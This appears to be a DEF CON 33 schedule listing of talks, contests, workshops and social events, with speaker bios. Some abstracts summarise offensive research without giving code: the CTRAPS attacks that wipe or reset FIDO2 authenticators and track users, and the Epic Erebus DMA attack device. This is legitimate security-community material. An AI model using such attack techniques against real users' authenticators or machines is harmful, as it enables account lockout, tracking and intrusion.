SpeakerBio: Matt CheungMatt Cheung started developing his interest in cryptography during an internship in 2011. He worked on implementation of a secure multi-party protocol by adding elliptic curve support to an existing secure text pattern matching protocol. Implementation weaknesses were not a priority and this concerned Matt. This concern prompted him to learn about cryptographic attacks from Dan Boneh's crypto 1 course offered on Coursera and the Matasano/cryptopals challenges. From this experience he has given workshops at the Boston Application Security Conference, BSidesLV, DEF CON, and the Crypto and Privacy VillageHe now serves on the programming committee of the Crypto and Privacy Village. He now serves on the programming committee of the Crypto and Privacy Village.
- ics Calendar file
Everything you need to know about beating CTF challenges
SpeakerBio: John Hammond, Cybersecurity Researcher
- ics Calendar file
FIDO2 is the de-facto standard for passwordless and 2FA authentication. FIDO2 relies on the Client-to-Authenticator Protocol (CTAP) to secure communications between clients (e.g., web browsers) and authenticators (e.g., USB dongles). In this talk, we perform a security assessment of CTAP and its Authenticator API. This API is a critical protocol-level attack surface that handles credentials and authenticator settings.
We investigate the standard FIDO2 setup (credentials stored by the relying party) and the most secure setup, where credentials are stored on the authenticator, protected from data breaches. We find that FIDO2 security mechanisms still rely on phishable mechanisms (i.e., PIN) and unclear security boundaries (e.g., trusting unauthenticated clients).
We introduce eleven CTRAPS attacks grouped into two novel classes: Client Impersonation and API Confusion. These attacks exploit CTAP vulnerabilities to wipe credentials, perform unauthorized factory resets, and track users. Our open-source toolkit implements the attacks on two Android apps, an Electron app, and a Proxmark3 script, supporting the USB HID and NFC transports. In our demos, we show how to use our CTRAPS toolkit to exploit popular authenticators, like YubiKeys, and relying parties, like Microsoft and Apple.
References:
Marco Casagrande is a postdoctoral researcher in cybersecurity at the KTH Royal Institute of Technology (Sweden). He specializes in the security of real-world smart devices, including fitness trackers, FIDO authenticators, and electric scooters.
SpeakerBio: Daniele AntonioliDaniele Antonioli is an Assistant Professor at EURECOM in the software and system security (S3) group. He researches and teaches applied system security and privacy, with an emphasis on wireless communication, such as Bluetooth and Wi-Fi, embedded systems, such as cars and fitness trackers, mobile systems, such as smartphones, and cyber-physical systems, such as industrial control systems.
- ics Calendar file
Various cyber tools and techniques have been utilized based on information from past attacks. Game players will learn about different cyber security frameworks, cyber-attack processes, and how they can use utilized in a fun way. The game is built to teach key cyber terms, theory and apply techniques based on real-world scenarios.
As a player, you are part of a Cyber Protection Team (CPT) assigned to the mission to prevent various attacks on critical infrastructure. Your task is to use the available information that your team has at your disposal to stop the adversary from achieving their objective.
Players will find themselves in a variety of future scenarios based on a specific industry/sector focus e.g. manufacturing, utilities, defense, finance. The task will be to defend each individual network/system to govern, identify, protect, detect, respond and recover against abnormal/suspicious activities on the network. You will be working against a global hacker network who is threatening to disrupt the overall operations of critical infrastructure sites for nefarious means.
Cyber Defender - The Game, teaches cyber professionals how hackers operate, the cyber kill chain, and tactics, techniques and procedures (TTPs) that can be employed to defend and attack critical infrastructure.
No
No
- ics Calendar file
Participants fly a custom narrow-body airliner with realistic controls and functions on approach to KBZN while encountering various cyber-anomalies. This challenge typically takes about 6 minutes, with a maximum of 15 minutes.
- ics Calendar file
When a system is compromised, the first questions are often: Who did this? and What were they after? But effective cybersecurity—and modern AI‑enhanced defense—goes far beyond just identifying the attacker; it’s about anticipating their next move.
Defeating cyber adversaries starts long before an alert fires. In this fast‑paced primer, we demystify the CTI intelligence lifecycle and structured models such as MITRE ATT&CK, showing how they convert raw telemetry into high‑value intelligence ready for action and fuel smarter purple‑team collaboration.
Join us for an introductory session on the fundamentals of Threat Intelligence—what it is, how it works, and how it's used to uncover, understand, and respond to evolving cyber threats—then see how AI‑powered automation accelerates indicator extraction, suggests hunting hypotheses, stitches detections across your stack for real‑time response, and how purple‑team validation closes the loop by proving your intel‑driven controls stop the threats you care about before the next breach.
SpeakerBio: Carlo Anez MazurcoCarlo Anez Mazurco is a career cybersecurity consultant who designs and implements defensive strategies for organizations of every size. Holding multiple GIAC‑level credentials (GCIH) alongside Security+ and Network+, he distills 15 years of threat‑hunting and incident‑response experience into actionable guidance. Carlo coaches hands‑on labs at DEFCON’s Blue Team Village and provides year‑round training for community groups such as the Women’s Society of Cyberjutsu, local BNI chapters, and veteran‑led upskilling programs—helping the wider security community build resilient, AI‑aware defenses.
- ics Calendar file
Contestants will access a virtual environment with dynamic challenges that need to be exploited and contested. Individuals gain points for each system they are able to plant and maintain their flag on.
- ics Calendar file
Redteam Rumble was piloted with a single competition at DEFCON 32 with great success, and we're thrilled to bring it back for DefCon 33! This event is designed with more advanced competitors in mind, and is not for the faint of heart!
Teams will defend their ""Castle,"" a virtual environment comprising several systems and services (both Windows and Linux systems may be included). Each castle has exposed services and exploitable vulnerabilities, along with a few hidden extras.
This event is a free-for-all between 4 teams competing against each other to gain points by controlling services and flags within their own, and each opponents, infrastructure. That means your team will have to balance defending your own systems, while simultaneously hunting for vulnerabilities that can be exploited to control other teams' systems.
Each event will consist of 4 teams competing in a free-for-all for 2 hours. Pre-registration is required.
- ics Calendar file
Strategic Operations will feature two teams going head to head in a classic offense vs defense battle. The defensive team gains points by successfully providing mission critical services during a short scoring window, while offensive teams will gain points by performing targeted service interruptions and data manipulation.
Each event will consist of 2 teams competing in an attacker vs defender battle for anywhere from 30 - 90 minutes. Pre-registration is reccomended, but not required.
One of our goals with Strategic Operations is to provide a fun and engaging experience for attendees that discover us on the competition floor, without requiring prior registration. We will do our best to accomodate walk in participants when possible!
- ics Calendar file
Matthias Göhring is security consultant and penetration tester at usd AG, an information security company based in Germany with the mission #moresecurity. He is Head of usd HeroLab, the division of usd specialized in technical security assessments. In addition, he holds lectures at Technical University Darmstadt and University of Applied Sciences Darmstadt on ethical hacking and penetration testing. In previous scientific work, he focused on network and communication security as well as software security.
Previous publications: - Catching the Clones – Insights in Website Cloning Attacks, Risk Connect Conference, 2021 - Path MTU Discovery Considered Harmful, IEEE 38th International Conference on Distributed Computing Systems (ICDCS), 2018 - Tor Experimentation Tools, IEEE Security and Privacy Workshops, 2015 - On randomness testing in physical layer key agreement, IEEE 2nd World Forum on Internet of Things (WF-IoT), 2015
- ics Calendar file
No spoilers! Join us for a thrilling premier of a DoD-designed wargame about undersea threats and cyber planning.
SpeakerBio: Jared MacDonald, NUWC
- ics Calendar file
DEF CON's first-ever rave: Expect to hear hardcore, happy hardcore, breakcore, speedcore, hardstyle. Bring your phat pants, kandi bracelets, and nine inch nails (on finger) to this once in a lifetime rave.
- ics Calendar file
Cyberjūtsu is a new way to teach cybersecurity inspired from martial arts trainings. It is an educational way which allows everyone (novice to expert) to practice together and improve themselves in cybersecurity through confrontation. It follows budō (judo, jujitsu, karate...) principles and ethical code. The goal is to reach "maximum-efficient use of computer" in a "mutual benefit" of a human confrontation. It's a digital martial art fight e-sport using linux shell.
- ics Calendar file
Cypherpunks write code that is open source, privacy-oriented, decentralized, trust-minimized, verifiable/auditable, interoperable, and bundled in Linux distributions. Cypherpunks don't use Java. But in 2025 using Java 25 and Nix -- they can and should!
We will review how functional-style programming, minimalism, pattern-matching, native compilation and integration with C/C++/Rust through a new FFM mechanism are game-changers for Java developers and worthy of a second look by those who dismissed Java years ago.
In this session we will see how Nix can reliably build native and JIT-compiled tools and applications, how dependencies can be minimized and bootstrappability achieved.
We will compare Maven's bytecode packaging to the Nix model and how the two can be integrated while also brining in native libraries.
Real-world examples will be provided. We will look at the gaps that remain and how to close them so we can live the Java-cypherpunk dream and contribute to the "Great Tree".
SpeakerBio: Sean GilliganMr. Gilligan learned C and UNIX as an undergrad at Berkeley. In his early career he wrote device drivers and networking protocols. He reluctantly learned Java and learned the good, the bad, and the ugly. His journey has included consulting, management, and entrepreneurship. He is the co-maintainer of bitcoinj, contributes to other open source projects, and is working to better integrate secure enclaves with secp256k1 ECC and Nix.
- ics Calendar file
Participants fly a simulated DA-62 complete with realistic Garmin instruments on approach into KDAB while encountering randomized GPS-spoof related scenarios. You can successfully complete the scenario by safely landing on your cleared runway. This challenge typically takes about 7 minutes, with a maximum of 20 minutes.
- ics Calendar file
- ics Calendar file
For all people that want to hang out and celebrate the lives and death of influential people to the hacker community. Attendees are encouraged to dress to kill in Day of the Dead attire or any attire that includes dead heroes. Music will be provided by CURZES and special guest DJs.
Everyone is welcome to join us and celebrate the dead!
- ics Calendar file
Community is essential and so is continual learning. Reading and discussing books can greatly impact an individual’s access and sense of community and knowledge. This DEF CON book discussion will be an accessible group aiming to build community and share out learnings, all in a quieter setting. Come join us in person and discuss what you’ve been reading. This DC Book Club is not locked to a region and we're around all year on Discord, where we discuss books and other topics. This meetup is for those who love books and escaping to the cyperpunk, scifi worlds that inspire DEF CON and our future. Come join us!
- ics Calendar file
DCNextGen event for youth 8-18 only. The DC NextGen youth party is the perfect place to loosen up and have fun with other kids and teens your age! There is no better time to hang out and chat with the new friends you've made here. All while enjoying fun games and cyber themed activities. Are you ready to build a team and hack the planet?
- ics Calendar file
Ready to frag like it’s 1999? The DCG Community is going full retro with a Quake III Arena LAN party—Friday and Saturday from 10am to 6pm! We’ve got 20 battle-ready PCs set up for you to drop in, squad up, and face off against fellow DEF CON attendees. No sign-up, no pressure—just fast-paced fun, old-school energy, and scoreboard glory. Form your own teams, dominate the arena, or just jump in for a quick frag between talks.
💥 All skill levels welcome. Come for the chaos, stay for the camaraderie. GG.
Speakers:polomaster,Nitetrain
- ics Calendar file
Calling all Chicago hackers—DCG312 is linking up at DEF CON 33! Swing by the DCG Community on Saturday, 8/9, from 12:00 to 14:00 to meet fellow Windy City folks, trade war stories, and connect over shared exploits (the legal kind). Whether you're Chi-town born or just Chi-curious, everyone's welcome. Come say hey and rep 312 in the desert!
SpeakerBio: willasaywhat, Point of Contact at DCG312
- ics Calendar file
800xl co-founder of DCGVR
- ics Calendar file
Come try your hand at being a DDoS attacker and/or defender in this fun cyberwar simulation. No experience or laptop needed! Sessions run every half hour.
- ics Calendar file
Future of DDoS Attacks and Prevention
SpeakerBio: Andrew Cockburn, Netscout
- ics Calendar file
- ics Calendar file
Modern software protectors increasingly rely on complex, often nested, virtualization techniques (VMProtect, Themida, custom solutions) which significantly hinder static and dynamic analysis. This talk introduces DragonSlayer, an automated framework combining symbolic execution with fine-grained dynamic taint tracking to systematically lift obfuscated bytecode from these protectors. Our approach precisely identifies VM handlers, recovers original instruction semantics, automatically unpacks multiple virtualization layers, and reconstructs analyzable representations of protected code. We demonstrate DragonSlayer's effectiveness against the latest commercial VM protectors and custom obfuscation solutions, significantly reducing analysis time from weeks to hours. This presentation includes technical deep-dives into our methodology, real-world case studies, and a demonstration of our tooling that helps reverse engineers slay the virtualization dragon.
References:
Dr. Agostino "van1sh" Panico is a seasoned offensive security expert with over 15 years of experience specializing in advanced red teaming, exploit development, product security testing, and deception tactics. He is one of the few hundred globally to hold the prestigious GSE (GIAC Security Expert) certification. Driven by a passion for uncovering vulnerabilities, Agostino actively contributes to the security community as an organizer for BSides Italy, fostering collaboration and innovation.
- ics Calendar file
As malware continues to evolve rapidly through code reuse, obfuscation, and minor variant generation, understanding the lineage of malicious code has become a critical part of threat intelligence and incident response. In this talk, we present how machine learning, embeddings, and graph-inspired modelling can be used to automatically uncover relationships between malware samples and trace their evolutionary history at scale.
SpeakerBio: David Rushmer
- ics Calendar file
Fuzzing is a technique of identifying software vulnerabilities by automated corpus generation. It has produced immense results and attracted a lot of visibility from security researchers and professionals in the industry, today fuzzing can be utilized in various ways which can be incorporated into your secure SDLC to discover vulnerabilities in advance and fix them. Attendees will be emulating techniques which will provide a comprehensive understanding of "Crash, Detect & Triage" of fuzzed binaries or software. In "Deep dive into fuzzing" we will be covering a detailed overview of fuzzing and how it can be beneficial to professionals in uncovering security vulnerabilities with a hands-on approach through focus on labs.
Finding vulnerabilities in software requires in-depth knowledge of different technology stacks. Modern day softwares have a huge codebase and may contain vulnerabilities, manually verifying such vulnerabilities is a tedious task and may not be possible in all cases. This training is designed in such a way that it introduces the concept of fuzzing and vulnerability discovery in software’s covering multiple platforms such as Linux & Windows and triage analysis for those vulnerabilities.
Speakers:Zubin Devnani,Dhiraj MishraZubin Devnani is a red teamer by trade, who has identified multiple vulnerabilities in commonly used software. He is a trainer at Blackhat and has delivered multiple workshops, including PHDays and Hacktivity. Utilizes his fuzzing skills in his day to day trade to identify new ways of breaking into enterprises! Blogging at devtty0.io and tweets on @p1ngfl0yd.
SpeakerBio: Dhiraj MishraDhiraj Mishra is an active speaker who has discovered multiple zero-days in modern web browsers and an open-source contributor. He is a trainer at Blackhat, BruCON, 44CON and presented in conferences such as Ekoparty, NorthSec, Hacktivity, PHDays, Hack in Paris & HITB. In his free time, he blogs at www.inputzero.io/www.fuzzing.at and tweets on @RandomDhiraj.
- ics Calendar file
Fuzzing is a technique of identifying software vulnerabilities by automated corpus generation. It has produced immense results and attracted a lot of visibility from security researchers and professionals in the industry, today fuzzing can be utilized in various ways which can be incorporated into your secure SDLC to discover vulnerabilities in advance and fix them. Attendees will be emulating techniques which will provide a comprehensive understanding of "Crash, Detect & Triage" of fuzzed binaries or software. In "Deep dive into fuzzing" we will be covering a detailed overview of fuzzing and how it can be beneficial to professionals in uncovering security vulnerabilities with a hands-on approach through focus on labs.
Finding vulnerabilities in software requires in-depth knowledge of different technology stacks. Modern day softwares have a huge codebase and may contain vulnerabilities, manually verifying such vulnerabilities is a tedious task and may not be possible in all cases. This training is designed in such a way that it introduces the concept of fuzzing and vulnerability discovery in software’s covering multiple platforms such as Linux & Windows and triage analysis for those vulnerabilities.
Speakers:Zubin Devnani,Dhiraj MishraZubin Devnani is a red teamer by trade, who has identified multiple vulnerabilities in commonly used software. He is a trainer at Blackhat and has delivered multiple workshops, including PHDays and Hacktivity. Utilizes his fuzzing skills in his day to day trade to identify new ways of breaking into enterprises! Blogging at devtty0.io and tweets on @p1ngfl0yd.
SpeakerBio: Dhiraj MishraDhiraj Mishra is an active speaker who has discovered multiple zero-days in modern web browsers and an open-source contributor. He is a trainer at Blackhat, BruCON, 44CON and presented in conferences such as Ekoparty, NorthSec, Hacktivity, PHDays, Hack in Paris & HITB. In his free time, he blogs at www.inputzero.io/www.fuzzing.at and tweets on @RandomDhiraj.
- ics Calendar file
Performing analysis of fake images and videos can be challenging considering the plethora of techniques that can be used to create a deepfake. In this session, we'll explore methods for identifying fake images and videos whether created by AI, photoshopped, or GAN-generated media. We'll then use this for the basis of a live demonstration walking through methods of exposing signs of alteration or AI generation using more than a dozen techniques to expose these forgeries. We'll also highlight a free GPT tool for performing your own analysis. Finally, we'll provide additional resources and thoughts for the future of deepfake detection.
SpeakerBio: Mike Raggo, Security Researcher at SilentSignalsMichael T. Raggo has over 30 years of security research experience. During this time, he has uncovered and ethically disclosed vulnerabilities in products including Samsung, Checkpoint, and Netgear. Michael is the author of “Mobile Data Loss: Threats & Countermeasures” and “Data Hiding” for Syngress Book. He is also a frequent presenter at security conferences, including Black Hat, DEF CON, Gartner, RSA, DoD Cyber Crime, OWASP, SANS. He was also awarded the Pentagon’s Certificate of Appreciation.
- ics Calendar file
The DEF CON MUD IS BACK... We tried to do battletech but we realized we needed better documentation.
Like all good plans we put together a new one at the last minute....
Without further delay we announce......Cheeseworld!!! An LPMUD from the 90's, a world of cheese, furbys and code that we have no idea how it's still working. Find ancient bugs, explore Wensleydale, roam the Nacho forest...
Download mudlet and connect to mud.defcon.wtf port 3022 (TLS) or 3000 (telnet)
Find EvilMog in the Contest and Events Area, the prize is usually pretty epic, winners chosen at 2pm Sunday August 10th.
Open now, get DEF CON started early!!!
- ics Calendar file
New to hacking? Start here. The DEF CON Academy is your entry point into the world of hacking and Capture the Flag (CTF) competitions. No experience? No problem. Stop by and you'll start with the basics — Linux commands, web security, binary challenges, and reverse engineering — and build up from there at your own pace. Mentors and real CTF pros will be on-site to help you when you get stuck, explain concepts, and cheer you on. Come sit down for a bit, plug in, enjoy our scheduled talks, and start leveling up your skills in a hands-on, no-pressure environment.
- ics Calendar file
Held every year since DEF CON 19 in 2011 (R.I.P. Riviera), (Except during that COVID thing - but we are not going to talk about that COVID thing), the DEF CON (unofficial) Beard and Mustache Contest highlights the intersection of facial hair and hacker culture.
For 2025 there will be four categories for the competition you may only enter one:
Full beard: Self-explanatory, for the truly bearded.
Partial Beard: For those sporting Van Dykes, Goatees, Mutton Chops, and other partial beard styles.
Mustache only: Judging on the mustache only, even if bearded. Bring your Handlebars, Fu Manchus, or whatever adorns your upper lip.
Freestyle: Anything goes, including fake and creatively adorned beards. Creative women often do well in the Freestyle category.
Real or Fake facial hair as described above.
no
- ics Calendar file
DEF CON hosts many CTF contests, but this one is special for us and our players. It is almost entirely binaries, all original, and designed to test the top teams in the world, no matter what automated assistance they bring with them. It’s an attack-defense contest, which enables even more treachery and creativity from players. Back for a fourth year are LiveCTF head-to-head reversing races, bringing more strategy and excitement to our busy game.
- ics Calendar file
Explores how DCGs extend the DEF CON ethos year-round. Shares practical stories of how local group POCs foster community. Encourages attendees to connect with their local group or form their own group in the absence of a DCG.
Speakers:Adam915,Jayson E. Street,Alethe DenisDEF CON Groups Global Coordinator
SpeakerBio: Jayson E. Street, Chief Adversarial Officer at Secure YetiJayson E. Street referred to in the past as: a "notorious hacker" by FOX25 Boston, "World Class Hacker" by National Geographic Breakthrough Series, and described as a "paunchy hacker" by Rolling Stone Magazine. He however prefers if people refer to him simply as a Hacker, Helper & Human.
He is the Chief Adversarial Officer at Secure Yeti and the author of the "Dissecting the hack: Series" (which is currently required reading at 5 colleges in 3 countries that he knows of). Jayson is also the DEF CON Groups Global Ambassador. He's spoken at DEF CON, DEF CON China, GRRCon, SAINTCON & at several other CONs & colleges on a variety of Information Security subjects. He was also a guest lecturer for the Beijing Institute of Technology for 10 years.
He loves to explore the world & networks as much as he can. He has successfully robbed banks, hotels, government facilities, Biochemical companies, etc. on five continents (Only successfully robbing the wrong bank in Lebanon once, all others he was supposed to)!
He is a highly carbonated speaker who has partaken of Pizza from Bulgaria to Brazil & China to The Canary Islands. He does not expect anybody to still be reading this far, but if they are please note he was proud to be chosen as one of Time's persons of the year for 2006.
SpeakerBio: Alethe Denis, Red Team at Bishop FoxDEF CON Groups Dept 2nd Lead
- ics Calendar file
Whether you're a seasoned DEF CON veteran or a curious newcomer, the DEF CON Scavenger Hunt promises to challenge your skills, tickle your wits, and ignite your hacker spirit. Our list is a portal to mystery, mischief, and mayhem. Assemble your team of up to 5 members, interpret the items, and submit your efforts at the booth to our esteemed judges. Go beyond the basics for bonus points. Legends are born here.
The DEF CON Scavenger Hunt is open to everyone, regardless of skill level or experience, no pre-qualifying necessary. We strive to maintain the balance of a low barrier to entry while providing a challenge that many are eager to take on. Casual players should not be overwhelmed by the list, find a handful of items and have fun. If you are looking to win however, you will need to fully immerse yourself in the DEF CON Scavenger Hunt. Let's make some memories together.
Remember that it's not just about fame, glory, or boxes of swag; the true allure is the camaraderie of fellow hackers, the knowledge that you've etched your mark on DEF CON history, and the ultimate badge of honor: bragging rights. Nothing says "I'm a hacker" quite like being triumphant at the DEF CON Scavenger Hunt.
- ics Calendar file
It's that time of year again friends - your lone star state cousins invite y'all to come hangout for midweek drinks and eats! Open to all.
Hosted by: The Cornish Pasty, 10 E Charleston Blvd, Las Vegas, NV 89104
Wednesday August 6th, 18:30-21:30
SpeakerBio: Skittish and Bus
- ics Calendar file
Defcon.run is a beloved tradition at DEF CON, bringing together hackers for a refreshing start to the day. Originally known as the DEF CON 4x5K, the event has evolved into a distributed, community-driven experience featuring fun runs and rucks across Las Vegas. Participants can choose from various routes, ranging from simple 5Ks to more ambitious distances.
For DEF CON 33, the gathering point is "The Spot" by the North Entrance of the Las Vegas Convention Center West Hall. Here, the real wild hares gather before the sun has a chance to burn up this city of sin. The runs kick off at 06:00 Thursday through Sunday! But be there early for hype talks and shenanigans. We also have a whole new Meshtastic setup and website features we're adding. There are other runs swag drops and social meetups planned throughout the day and night as well!
Whether you're a seasoned runner or looking for something different, defcon.run offers a unique way to connect with other hackers and kick off your day. For more details and to sign up, visit defcon.run.
- ics Calendar file
Chaos at a major international airport. Flight info displays flicker with false data. Baggage systems fail. Aircraft controls are compromised. Even the skies are no longer safe. Your mission: investigate the breach, neutralize the threats, and take back control of the airport. The airport depends on you. The clock is ticking!
- ics Calendar file
A dedicated area equipped with the necessary tools, where visitors can experiment with various techniques and concepts under expert guidance.
- ics Calendar file
This session will introduce the strategy of designing and deploying deception strategies across ICS environments, by leveraging and operationalizing the Mitre Engage adversarial framework. This presentation will discuss the complexities related to deploying deception within ICS environments, and how to design a deception strategy geared towards the adversaries targeting your environment. A real-world case study, focusing on APT44, will demonstrate how to implement a deception strategy for Critical Infrastructure organisations.
SpeakerBio: Brent Muir, GoogleBrent has over 18 years experience working in the cybersecurity industry. He spent 12 years working in the Australian government sector, including Law Enforcement agencies, leading national cyber teams. Following his government work, Brent led the global digital forensics and incident response team for a Fortune 500 bank. His expertise has led him to working directly with C-Suite and Crisis Management teams, handling large-scale cyber incidents, including APT-linked cyber espionage campaigns. In addition to government and financial sectors, Brent has extensive experience working in Operational Technology industries, including telecommunications and energy providers.
- ics Calendar file
While cloud-native AI dominates security discussions, desktop apps—still vital in engineering, design, and finance—are quietly evolving. No longer just “legacy,” they now embed local LLMs, predictive UIs, automation, and offline inference.
This talk reframes AI security for desktop environments. We’ll explore new risks: prompt injection in on-device models, adversarial inputs, inference abuse, and insecure plugins. These threats don’t replace traditional flaws like memory corruption or unsafe parsing—they amplify them.
We’ll demo prompt injection on a local LLM and file-format fuzzing causing legacy crashes. Then we’ll cover AI-aware threat modeling, including tampered models and insecure automation. If you think desktop app security is solved, this talk will challenge that—and offer tools to secure hybrid software at the AI + legacy intersection.
SpeakerBio: UdayUday is a principal security engineer at Autodesk, where he focuses on securing applications at the intersection of traditional software and emerging AI features. His work spans offensive research, fuzzing, threat modeling, building guardrails and integrating security into the SDLC at scale. He is especially passionate about securing desktop applications in a world rapidly shifting toward AI-first development.
Outside of work, Uday enjoys playing CTF challenges, running fuzz farms, and snowboarding to unwind. He is committed to mentoring others in the security community and is excited to share lessons from the field.
- ics Calendar file
Learn how to build a state-of-the-art quantum sensor, no physics PhD necessary!
Quantum Technology may sound like a faraway ultra-neon cyber fever dream, and in the case of quantum computing it may be some time before we’re swapping QPUs on our laptops… But Quantum Sensing is here, and we felt the time was about right to break open this technology for all.
We designed and are releasing the first ever fully open source, hackable quantum sensor. Utilising common off the shelf parts, and a sample of Nitrogen-Vacancy Centre Diamond, we will be able to measure magnetic fields with light. We will show you how to build your own device, what tech is required, and how to get a signal from the diamond. We’ll discuss some of the use cases of these sensors, from medtech to defeating GPS jamming. Then we’ll show you how to hack with it, taking the first steps to using these sensors to infer the behaviour of a chip via magnetometry. #QuantumHackers
This talk is the main demonstration of this year’s Quantum Village Badge - an actual quantum sensor released for the International Year of Quantum. Whilst others will make you think that you need advanced degrees and an expensive lab, we’ll be building quantum sensors in our garages and pushing the limits of this brand new technology; Access All Atoms!
References:
Mark is a mathematician and Quantum Hacker. Working at the bleeding edge of technology for two decades, he- a has presented on an array of topics stemming from his work on quantum information, machine learning, cryptography and cybersecurity data science. He has presented at major conferences around the world and his work was recently nominated for Innovation of the Year at the SANS Difference Makers Awards. Mark co-founded Quantum Village.
SpeakerBio: Victoria "V__Wave" KumaranVictoria has been hacking her way through tech over the years, making her first software tool aged 8. Victoria has a background in product design, has paid her dues in finance, has run startups using machine learning for cybersecurity & malware analysis and was an Entrepreneurial Lead on the NSF I-Corps Program. She studied art and design at Central Saint Martins and co-founded Quantum Village.
- ics Calendar file
DMA vulnerabilities aren't new - but they don't seem to have gone anywhere. In the time software attacks have gone from a single bug to a multi-stage exploit chain, DMA attacks have gone from slipping some hardware into an internal slot of a computer to... plugging in an external device?
Despite decades of attacks, tooling, and even mitigations, most systems are still wide open to these attacks because of their perceived difficulty, poor system configuration, and lack of effective testing mechanisms.
Epic Erebus is a new tool that tries to address these issues. It's small, portable, and easy to use. It can slip through most systems unless the hardware, bios, and operating system are properly configured (a rarity). Finally, it's an entirely open PCIe implementation that gives you full control over Transaction Layer Packets - allowing you to reverse engineer the PCIe Bus and the DMA mitigations in place (Get it? RE-Bus... Erebus!)
You should come away understanding what erebus is capable of, the basics of how to use it, and what to look out for when properly implementing DMA attack mitigations.
References:
Joe FitzPatrick (@securelyfitz) is a Trainer and Researcher at SecuringHardware.com (@securinghw). Joe has spent most of his career working on low-level silicon debug, security validation, and penetration testing of CPUs, SoCs, and microcontrollers. He has spent decades developing and delivering hardware security related tools and training, instructing hundreds of security researchers, pen testers, and hardware validators worldwide. When not teaching Applied Physical Attacks training, Joe is busy developing new course content or working on contributions to the NSA Playset and other misdirected hardware projects, which he regularly presents at all sorts of fun conferences.
SpeakerBio: Grace "Baelfire" ParrishGrace Parrish (@BaelfireNightshd@infosec.exchange) is in her final year of a cybersecurity degree at Oregon State University. Grace has spent much of her career working with industrial control systems but has also dabbled in electrical engineering, FPGAs, microcontrollers, and a quick decade as a board level repair technician. In her spare time as a student, she has served as the team captain for a pentesting competition, has written custom Binary Ninja plugins, and has helped deliver hardware security training at Black Hat. Grace is looking forward to working in the offensive security space once she completes her degree.
- ics Calendar file
The CVE Program has been a cornerstone of cybersecurity for over two decades, but its original design was never meant to support AI-discovered vulnerabilities, real-time coordination, or global software supply chains. The CVE Program has evolved from a technical utility to become a pillar of public cybersecurity policy. As governments craft regulation around vulnerability disclosure, product security, and software liability, the CVE system is increasingly at the center of the conversation, but innovation in vulnerability discovery has outpaced innovation in vulnerability tracking, lagging behind the needs of policy, industry, and international coordination.
This panel will explore how public policy can promote innovation within the CVE Program to meet growing global expectations. Topics will include how AI and automation can modernize disclosure at scale, how CVE labelling can evolve with emerging technologies, and how solutions must address the risk of fragmentation (national vulnerability databases and duplicative disclosure systems) to be future proof.
Speakers:Elizabeth Eigner,Chandan Nandakumaraiah,Madison Oliver,Trey FordElizabeth Eigner is a Security Policy Strategist on Microsoft’s Global Cybersecurity Policy team, where she represents Microsoft on the Hacking Policy Council, where she works collaboratively with industry leaders and policymakers to advance responsible cybersecurity and strengthen the frameworks that underpin software security worldwide. Previously, she served as Microsoft’s representative on the Cloud Service Provider Advisory Board (CSP-AB), contributing to FedRAMP public policy discussions and best practices for cloud security. Elizabeth also leads Microsoft's Advancing Regional Cybersecurity (ARC) initiative, focusing on improving incident response capabilities and cyber capacity building in the Global South.
Before joining Microsoft, Elizabeth worked at The Washington Technology Industry Association to enhance Washington State's innovation ecosystem. At MIT Solve, she collaborated with tech-based social entrepreneurs on solutions fostering digital inclusion and equitable economic opportunity. She holds a B.S. in Political Science from Northeastern University, with a concentration in Law and International Security.
SpeakerBio: Chandan NandakumaraiahTrey Ford is a seasoned strategic advisor and security thought leader with over 25 years of experience in offensive and defensive disciplines (incident response, application, network, cloud, and platform security). Trey has held key leadership roles at Deepwatch, Vista Equity Partners, Salesforce, Black Hat, and more. He has also been a valued member of Bugcrowd's advisory board for over a decade.
Trey is passionate about working with enterprise leaders, corporate directors, and investors to help teams strengthen their technology and execution strategy. He believes in a hands-on approach to building, breaking, and deconstructing security problems.
Trey has a Master of Science from the University of Texas at Austin and executive education at Harvard Business School. Hailing from Austin, he is a husband, father, and an instrument rated private pilot.
- ics Calendar file
Join us for a self-guided interactive look at GE Applinces and get hands on with some of our most popular home appliances!
And for all Home Assistant enthusiasts!
Check us out and we will help you get started!
Find anything related to security? Contact our PSIRT by visiting our security webpage:
GEAppliances.comn/security
- ics Calendar file
Find out about developing and showcasing your security skills beyond your day-to‑day roles. Activities like CTFs, bug bounties, and open source projects offer an ideal platform for newcomers to learn the ropes and for seasoned professionals to deepen expertise in specific domains.
Speakers:Snahil Singh,Ying Liu
- ics Calendar file
Ready to make a difference in your workplace? This discussion-based session provides practical insights and a supportive space to explore how individuals can effectively advocate for accessibility. From navigating accommodation requests to identifying and improving systemic barriers, plus effectively educating peers and leadership, we'll discuss actionable steps you can take to create a more equitable and productive work environment for yourself - and everyone. Come share your insights and empower change!
SpeakerBio: Britne JenkeBritne Jenke, CPACC (she/her) is an author, speaker, and consultant - and a passionate advocate for disability inclusion in the workplace. As the founder of Inclusive Pixelation, an accessibility consulting agency, she partners with individuals and organizations to empower them with the knowledge, skills, and tools to make work truly accessible for everyone. Britne's expertise comes from decades of experience in training and development, web design, and information services, and is further validated by her certifications in accessibility, human resources, talent development, and diversity & inclusion. Her insights have been featured in multiple articles and podcasts, and she is a frequent and sought-after speaker at various industry events and conferences. Committed to community impact and professional development, Britne proudly serves on the board of Equal Access Public Media and works as the Director of Curriculum for The Anti-Discrimination Project. Her mission is to make work accessible for everyone, one pixel at a time.
- ics Calendar file
In this session we’ll discuss the struggles of balancing a career in cybersecurity and the stress of the world, for everyone. Whether a diagnosed mental health condition, general stress challenges, signs of burnout, or just wanting to know you aren’t alone working through life, this discussion is a brave space to get answers, ask questions, provide insight, and come away with more ideas on how to tackle keeping your brain protected while keeping the business protected.
SpeakerBio: Mea CliftMea Clift is a distinguished cybersecurity executive with a multi-decade career rooted in excellence, innovation, and mission-driven leadership. As Principal Executive Advisor for Cyber Risk Engineering at Liberty Mutual, she provides strategic guidance to underwriters and insureds on emerging cyber risks, maturity models, and industry trends—bridging the gap between cybersecurity strategy and enterprise risk.
With deep expertise in governance, risk, and compliance (GRC), Mea is a champion of NIST-based frameworks, Zero Trust principles, and supply chain security. Her background spans critical infrastructure protection, regulatory alignment, and the development of governance structures that embed security across the business. She is widely respected for her ability to translate complex technical risks into clear, compelling language for executives and stakeholders alike.
A 2024 Cyversity Educator of the Year, published author, and active mentor, Mea teaches Fundamentals of GRC and advocates for diversity in cybersecurity through many organizations including Wicys, Cyversity and ISACA. Outside of her professional work, she is a passionate quilt historian and educator living in St. Paul, Minnesota, where she shares her love of textiles and design alongside her three greyhounds.
- ics Calendar file
